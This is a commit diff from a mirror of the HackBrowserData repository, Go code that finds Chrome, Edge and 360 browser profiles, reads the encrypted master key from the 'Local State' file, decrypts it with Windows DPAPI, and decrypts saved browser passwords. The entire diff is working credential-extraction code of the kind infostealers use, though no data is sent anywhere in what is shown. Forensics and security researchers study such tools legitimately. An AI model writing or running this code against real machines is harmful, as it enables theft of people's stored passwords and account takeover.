mirror of
https://github.com/moonD4rk/HackBrowserData.git
synced 2026-05-19 18:58:03 +02:00
version 0.1.0
This commit is contained in:
ᴍᴏᴏɴD4ʀᴋ
+94
-34
@@ -4,9 +4,9 @@ import (
|
||||
"crypto/aes"
|
||||
"crypto/cipher"
|
||||
"encoding/base64"
|
||||
"hack-browser-data/log"
|
||||
"errors"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"syscall"
|
||||
"unsafe"
|
||||
|
||||
@@ -14,50 +14,96 @@ import (
|
||||
)
|
||||
|
||||
const (
|
||||
winChromeKeyDir = "/AppData/Local/Google/Chrome/User Data/Local State"
|
||||
winChromeDir = "/AppData/Local/Google/Chrome/User Data/*/"
|
||||
chromeDir = "/AppData/Local/Google/Chrome/User Data/*/"
|
||||
chromeKeyFile = "/AppData/Local/Google/Chrome/User Data/Local State"
|
||||
secure360Dir = "/AppData/Local/360chrome/Chrome/User Data/*/"
|
||||
secure360KeyFile = ""
|
||||
edgeDir = "/AppData/Local/Microsoft/Edge/User Data/*/"
|
||||
edgeKeyFile = "/AppData/Local/Microsoft/Edge/User Data/Local State"
|
||||
)
|
||||
|
||||
var (
|
||||
chromeKey []byte
|
||||
|
||||
browserList = map[string]struct {
|
||||
Dir string
|
||||
Key string
|
||||
}{
|
||||
"chrome": {
|
||||
chromeDir,
|
||||
chromeKeyFile,
|
||||
},
|
||||
"edge": {
|
||||
edgeDir,
|
||||
edgeKeyFile,
|
||||
},
|
||||
"360secure": {
|
||||
secure360Dir,
|
||||
secure360KeyFile,
|
||||
},
|
||||
}
|
||||
)
|
||||
|
||||
func InitChromeKey() error {
|
||||
chromeKeyPath := os.Getenv("USERPROFILE") + winChromeKeyDir
|
||||
keyFile, err := ReadFile(chromeKeyPath)
|
||||
if err != nil {
|
||||
log.Error(err)
|
||||
return err
|
||||
|
||||
func PickBrowser(name string) (browserDir, key string, err error) {
|
||||
name = strings.ToLower(name)
|
||||
if choice, ok := browserList[name]; ok {
|
||||
if choice.Key != "" {
|
||||
return os.Getenv("USERPROFILE") + choice.Dir, os.Getenv("USERPROFILE") + choice.Key, nil
|
||||
} else {
|
||||
return os.Getenv("USERPROFILE") + choice.Dir, "", nil
|
||||
}
|
||||
}
|
||||
s := gjson.Get(keyFile, "os_crypt.encrypted_key").String()
|
||||
masterKey, err := base64.StdEncoding.DecodeString(s)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
chromeKey, err = DecryptStringWithDPAPI(masterKey[5:])
|
||||
return err
|
||||
return "", "", errBrowserNotSupported
|
||||
}
|
||||
|
||||
func GetDBPath(dbName ...string) (dbFile []string) {
|
||||
var dbPath []string
|
||||
chromeDBPath := os.Getenv("USERPROFILE") + winChromeDir
|
||||
for _, v := range dbName {
|
||||
dbPath = append(dbPath, chromeDBPath+v)
|
||||
var (
|
||||
errBase64DecodeFailed = errors.New("decode base64 failed")
|
||||
)
|
||||
|
||||
func InitKey(key string) error {
|
||||
if key == "" {
|
||||
VersionUnder80 = true
|
||||
return nil
|
||||
}
|
||||
for _, v := range dbPath {
|
||||
s, err := filepath.Glob(v)
|
||||
if err != nil && len(s) == 0 {
|
||||
continue
|
||||
}
|
||||
if len(s) > 0 {
|
||||
log.Debugf("Find %s File Success", v)
|
||||
log.Debugf("%s file location is %s", v, s[0])
|
||||
dbFile = append(dbFile, s[0])
|
||||
}
|
||||
keyFile, err := ReadFile(key)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
encryptedKey := gjson.Get(keyFile, "os_crypt.encrypted_key")
|
||||
if encryptedKey.Exists() {
|
||||
pureKey, err := base64.StdEncoding.DecodeString(encryptedKey.String())
|
||||
if err != nil {
|
||||
return errBase64DecodeFailed
|
||||
}
|
||||
chromeKey, err = decryptStringWithDPAPI(pureKey[5:])
|
||||
return nil
|
||||
} else {
|
||||
VersionUnder80 = true
|
||||
return nil
|
||||
}
|
||||
return dbFile
|
||||
}
|
||||
|
||||
//func GetDBPath(dir string, dbName ...string) (dbFile []string) {
|
||||
// var dbPath []string
|
||||
// chromeDBPath := os.Getenv("USERPROFILE") + dir
|
||||
// for _, v := range dbName {
|
||||
// dbPath = append(dbPath, chromeDBPath+v)
|
||||
// }
|
||||
// for _, v := range dbPath {
|
||||
// s, err := filepath.Glob(v)
|
||||
// if err != nil && len(s) == 0 {
|
||||
// continue
|
||||
// }
|
||||
// if len(s) > 0 {
|
||||
// log.Debugf("Find %s File Success", v)
|
||||
// log.Debugf("%s file location is %s", v, s[0])
|
||||
// dbFile = append(dbFile, s[0])
|
||||
// }
|
||||
// }
|
||||
// return dbFile
|
||||
//}
|
||||
|
||||
func DecryptChromePass(encryptPass []byte) (string, error) {
|
||||
if len(encryptPass) > 15 {
|
||||
// remove prefix 'v10'
|
||||
@@ -103,7 +149,7 @@ func (b *DataBlob) ToByteArray() []byte {
|
||||
}
|
||||
|
||||
// chrome < 80 https://chromium.googlesource.com/chromium/src/+/76f496a7235c3432983421402951d73905c8be96/components/os_crypt/os_crypt_win.cc#82
|
||||
func DecryptStringWithDPAPI(data []byte) ([]byte, error) {
|
||||
func decryptStringWithDPAPI(data []byte) ([]byte, error) {
|
||||
dllCrypt := syscall.NewLazyDLL("Crypt32.dll")
|
||||
dllKernel := syscall.NewLazyDLL("Kernel32.dll")
|
||||
procDecryptData := dllCrypt.NewProc("CryptUnprotectData")
|
||||
@@ -116,3 +162,17 @@ func DecryptStringWithDPAPI(data []byte) ([]byte, error) {
|
||||
defer procLocalFree.Call(uintptr(unsafe.Pointer(outBlob.pbData)))
|
||||
return outBlob.ToByteArray(), nil
|
||||
}
|
||||
|
||||
func DecryptStringWithDPAPI(data []byte) (string, error) {
|
||||
dllCrypt := syscall.NewLazyDLL("Crypt32.dll")
|
||||
dllKernel := syscall.NewLazyDLL("Kernel32.dll")
|
||||
procDecryptData := dllCrypt.NewProc("CryptUnprotectData")
|
||||
procLocalFree := dllKernel.NewProc("LocalFree")
|
||||
var outBlob DataBlob
|
||||
r, _, err := procDecryptData.Call(uintptr(unsafe.Pointer(NewBlob(data))), 0, 0, 0, 0, 0, uintptr(unsafe.Pointer(&outBlob)))
|
||||
if r == 0 {
|
||||
return "", err
|
||||
}
|
||||
defer procLocalFree.Call(uintptr(unsafe.Pointer(outBlob.pbData)))
|
||||
return string(outBlob.ToByteArray()), nil
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user